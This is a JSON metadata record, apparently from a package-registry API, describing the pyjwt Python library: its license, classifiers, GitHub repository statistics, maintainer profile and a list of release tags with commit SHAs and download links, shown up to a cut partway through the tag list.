{"id":3490,"name":"pyjwt","ecosystem":"pip","repository_url":"https://github.com/jpadilla/pyjwt","issues_count":1069,"created_at":"2025-06-06T16:30:11.862Z","updated_at":"2025-06-06T16:30:11.862Z","purl":"pkg:pypi/pyjwt","metadata":{"id":2874279,"name":"pyjwt","ecosystem":"pypi","description":"JSON Web Token implementation in Python","homepage":"https://github.com/jpadilla/pyjwt","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/jpadilla/pyjwt","keywords_array":["json","jwt","security","signing","token","web"],"namespace":null,"versions_count":51,"first_release_published_at":"2011-02-24T21:51:08.000Z","latest_release_published_at":"2024-11-28T03:43:27.000Z","latest_release_number":"2.10.1","last_synced_at":"2025-06-06T00:12:50.167Z","created_at":"2022-04-10T12:14:13.189Z","updated_at":"2025-06-06T00:12:50.167Z","registry_url":"https://pypi.org/project/pyjwt/","install_command":"pip install pyjwt --index-url https://pypi.org/simple","documentation_url":"https://pyjwt.readthedocs.io/","metadata":{"funding":null,"documentation":null,"classifiers":["Development Status :: 5 - Production/Stable","Intended Audience :: Developers","License :: OSI Approved :: MIT License","Natural Language :: English","Programming Language :: Python","Programming Language :: Python :: 3","Programming Language :: Python :: 3 :: Only","Programming Language :: Python :: 3.10","Programming Language :: Python :: 3.11","Programming Language :: Python :: 3.12","Programming Language :: Python :: 3.13","Programming Language :: Python :: 3.9","Topic :: Utilities"],"normalized_name":"pyjwt"},"repo_metadata":{"id":1396960,"uuid":"1408162","full_name":"jpadilla/pyjwt","owner":"jpadilla","description":"JSON Web Token implementation in Python","archived":false,"fork":false,"pushed_at":"2025-05-27T07:49:18.000Z","size":1148,"stargazers_count":5378,"open_issues_count":30,"forks_count":701,"subscribers_count":62,"default_branch":"master","last_synced_at":"2025-05-29T00:19:06.258Z","etag":null,"topics":["hacktoberfest","jwt","python"],"latest_commit_sha":null,"homepage":"https://pyjwt.readthedocs.io","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":"jondot/padrino-warden","license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jpadilla.png","metadata":{"files":{"readme":"README.rst","changelog":"CHANGELOG.rst","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":"AUTHORS.rst","dei":null,"publiccode":null,"codemeta":null,"zenodo":null},"funding":{"github":["jpadilla"]}},"created_at":"2011-02-24T20:25:09.000Z","updated_at":"2025-05-28T22:46:45.000Z","dependencies_parsed_at":"2023-02-16T18:46:24.902Z","dependency_job_id":"e551adaa-a697-4968-9165-4ad26d8ba502","html_url":"https://github.com/jpadilla/pyjwt","commit_stats":{"total_commits":666,"total_committers":140,"mean_commits":4.757142857142857,"dds":0.7777777777777778,"last_synced_commit":"d8b12421654840418fd25b86553795c0c09ed0a9"},"previous_names":["progrium/pyjwt"],"tags_count":45,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jpadilla","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":257344983,"owners_count":22531634,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"jpadilla","name":"José Padilla","uuid":"83319","kind":"user","description":"@auth0 + @filepreviews ","email":"","website":"https://jpadilla.com","location":"Hartford, CT","twitter":"jpadilla_","company":"@auth0 ","icon_url":"https://avatars.githubusercontent.com/u/83319?v=4","repositories_count":229,"last_synced_at":"2025-05-31T09:48:49.831Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/jpadilla","funding_links":["https://github.com/sponsors/jpadilla"],"total_stars":11960,"followers":1359,"following":419,"created_at":"2022-11-02T16:29:26.720Z","updated_at":"2025-05-31T09:48:49.831Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jpadilla","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jpadilla/repositories"},"tags":[{"name":"2.10.1","sha":"3ebbb22f30f2b1b41727b269a08b427e9a85d6bb","kind":"commit","published_at":"2024-11-28T03:30:29.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/2.10.1","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/2.10.1/manifests"},{"name":"2.10.0","sha":"783f324e5d2155462515ced45718fc164dd04db2","kind":"commit","published_at":"2024-11-16T13:57:38.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/2.10.0","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/2.10.0/manifests"},{"name":"2.9.0","sha":"868cf4ab2ca5a0a39da40e5a14dd740b203662b2","kind":"commit","published_at":"2024-07-31T12:40:12.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/2.9.0","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/2.9.0/manifests"},{"name":"2.8.0","sha":"72ad55f6d7041ae698dc0790a690804118be50fc","kind":"commit","published_at":"2023-07-18T18:30:05.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/2.8.0","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/2.8.0/manifests"},{"name":"2.7.0","sha":"d7c54dbebdab2ae17f7948fd4432b15e1bb82852","kind":"commit","published_at":"2023-05-09T19:04:21.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/2.7.0","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/2.7.0/manifests"},{"name":"2.6.0","sha":"7665aa625506a11bae50b56d3e04413a3dc6fdf8","kind":"commit","published_at":"2022-10-20T01:08:12.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/2.6.0","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/2.6.0/manifests"},{"name":"2.5.0","sha":"c9006103b56359b3ad788bb2e380ef17dfe59b05","kind":"commit","published_at":"2022-09-17T13:52:22.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/2.5.0","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/2.5.0/manifests"},{"name":"2.4.0","sha":"83ff831a4d11190e3a0bed781da43f8d84352653","kind":"commit","published_at":"2022-05-12T18:51:41.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/2.4.0","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/2.4.0/manifests"},{"name":"2.3.0","sha":"98620ab2a396a5c887a494259d49552c2093e1ad","kind":"commit","published_at":"2021-10-16T15:46:05.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/2.3.0","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/2.3.0/manifests"},{"name":"2.2.0","sha":"6223ba13780a941a3f4c9dec62f282bdd9b5afb0","kind":"commit","published_at":"2021-10-06T14:03:12.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/2.2.0","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/2.2.0/manifests"},{"name":"2.1.0","sha":"79c23d7d9d32364be8f94680d8eda7135c3a15d5","kind":"commit","published_at":"2021-04-28T11:59:15.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/2.1.0","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/2.1.0/manifests"},{"name":"2.0.1","sha":"3993ce1d3503b58cf74699a89ba9e5c18ef9b556","kind":"commit","published_at":"2021-01-17T17:56:19.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/2.0.1","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/2.0.1/manifests"},{"name":"2.0.0","sha":"482364776109cb597af7f679161dcf9c3ef5d0ea","kind":"commit","published_at":"2020-12-22T13:37:35.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/2.0.0","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/2.0.0/manifests"},{"name":"2.0.0a2","sha":"5bf8e70f26309b0a5ceda49ce0a7e97e89eee764","kind":"commit","published_at":"2020-12-20T00:02:44.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/2.0.0a2","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/2.0.0a2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/2.0.0a2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/2.0.0a2/manifests"},{"name":"2.0.0a1","sha":"8041cb607a733a9b5fffe1e9136d55a40bcea25b","kind":"commit","published_at":"2020-11-02T12:58:11.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/2.0.0a1","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/2.0.0a1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/2.0.0a1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/2.0.0a1/manifests"},{"name":"1.7.1","sha":"b65e1ac6dc4d11801f3642eaab34ae6a54162c18","kind":"tag","published_at":"2018-12-07T13:40:31.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/1.7.1","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/1.7.1/manifests"},{"name":"1.7.0","sha":"3f735fdf68cc865a6241aae1fcf92a410c73fbdb","kind":"tag","published_at":"2018-12-02T03:49:29.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/1.7.0","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/1.7.0/manifests"},{"name":"1.6.4","sha":"d25c92ca5e9980ca7bc8b31420bf36e3f4a9e3f0","kind":"tag","published_at":"2018-05-24T02:47:12.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/1.6.4","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/1.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/1.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/1.6.4/manifests"},{"name":"1.6.3","sha":"070015d79ed5277c6d76fa8f996fb9698257afe4","kind":"tag","published_at":"2018-05-19T17:13:50.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/1.6.3","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/1.6.3/manifests"},{"name":"1.6.1","sha":"285afade1d14eb810615c5bc751ea2c6a7a3314a","kind":"tag","published_at":"2018-03-18T13:38:37.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/1.6.1","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/1.6.1/manifests"},{"name":"1.6.0","sha":"7ae1dee63dab887d39ea4ca3365e81392a1c2396","kind":"tag","published_at":"2018-03-03T16:55:02.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/1.6.0","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/1.6.0/manifests"},{"name":"1.5.3","sha":"72bb76cb343bb6d0f40fcd0d136898b8ba08c323","kind":"tag","published_at":"2017-09-05T18:21:44.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/1.5.3","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/1.5.3/manifests"},{"name":"1.5.2","sha":"74399b1856573d8545b8dbbcac0db29a5656979d","kind":"tag","published_at":"2017-06-22T16:31:48.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/1.5.2","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/1.5.2/manifests"},{"name":"1.5.1","sha":"bc966214de9852258dd00dd2efc01ce6c9a22ac6","kind":"tag","published_at":"2017-06-22T14:57:07.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/1.5.1","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/1.5.1/manifests"},{"name":"1.5.0","sha":"908ee84aeefb8126a94e48e88ba9916d9d2512b3","kind":"tag","published_at":"2017-04-19T14:38:28.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/1.5.0","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/1.5.0/manifests"},{"name":"1.4.2","sha":"b35d522135044ba10ac41e7db5b95348cb4c4707","kind":"commit","published_at":"2016-08-08T19:42:23.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/1.4.2","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/1.4.2/manifests"},{"name":"1.4.1","sha":"daf79c1d2143d969e4ba19ec0692cfac773fa6be","kind":"tag","published_at":"2016-07-13T11:23:01.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/1.4.1","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/1.4.1/manifests"},{"name":"1.4.0","sha":"96c029a89f6311305ff93104db49c3c377072e1d","kind":"tag","published_at":"2015-07-17T01:30:42.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/1.4.0","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/1.4.0/manifests"},{"name":"1.3.0","sha":"8e4ef3cb47af5f37826b3c6f1a12c5000513fa14","kind":"tag","published_at":"2015-05-22T15:51:30.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/1.3.0","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/1.3.0/manifests"},{"name":"1.2.0","sha":"a125433bff60c4642d267fedbc676e500272c6ae","kind":"commit","published_at":"2015-04-28T16:07:24.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/1.2.0","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/1.2.0/manifests"},{"name":"1.1.0","sha":"490dfd646bea97bcc7b9832e6ddf16c55260958d","kind":"tag","published_at":"2015-04-15T20:54:48.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/1.1.0","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/1.1.0/manifests"},{"name":"1.0.1","sha":"8f28b4a6124830fcea400668840e645bb91e38a2","kind":"tag","published_at":"2015-03-26T21:10:48.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/1.0.1","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/1.0.1/manifests"},{"name":"1.0.0","sha":"3cc2e998a84a8cd6e5a0c4e67caf038d337458d8","kind":"tag","published_at":"2015-03-18T17:10:39.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/1.0.0","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/1.0.0/manifests"},{"name":"0.4.3","sha":"d72c3d4821e93593031a2e188d43f503706c047e","kind":"tag","published_at":"2015-02-18T20:37:07.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/0.4.3","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/0.4.3/manifests"},{"name":"0.4.2","sha":"451004ea60fb91ad658f770de66c90ca0cd228ab","kind":"tag","published_at":"2015-02-18T19:14:01.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/0.4.2","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/0.4.2/manifests"},{"name":"0.4.1","sha":"016b0bf9349019ac90aa4c61c728660af003ea72","kind":"tag","published_at":"2015-01-08T16:23:48.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/0.4.1","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/0.4.1/manifests"},{"name":"0.4.0","sha":"10485f7cf7870a897a280f5d616b2026f17fa378","kind":"tag","published_at":"2014-12-23T12:15:22.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/0.4.0","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/0.4.0/manifests"},{"name":"0.3.2","sha":"cd32cf25f07994a2b22b47a4d6c5b71137b252bd","kind":"tag","published_at":"2014-12-13T22:27:16.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/0.3.2","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/0.3.2/manifests"},{"name":"0.3.1","sha":"139a779427fb5ca64e940fc2ea33402a80884949","kind":"tag","published_at":"2014-12-03T13:07:00.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/0.3.1","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/0.3.1/manifests"},{"name":"0.3.0","sha":"fc60927c2dc35bca29641c52a7ba1b1596f4d105","kind":"tag","published_at":"2014-10-22T05:37:54.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/0.3.0","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/0.3.0/manifests"},{"name":"0.2.3","sha":"739efeff4c6c1fc30ab5cf5eb0ac337e8ee107d7","kind":"tag","published_at":"2014-10-16T04:07:59.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/0.2.3","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/0.2.3/manifests"},{"name":"0.2.2","sha":"a99f4015d1f11ddc18ac8da5f6604d5b31aa125e","kind":"tag","published_at":"2014-09-23T02:40:34.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt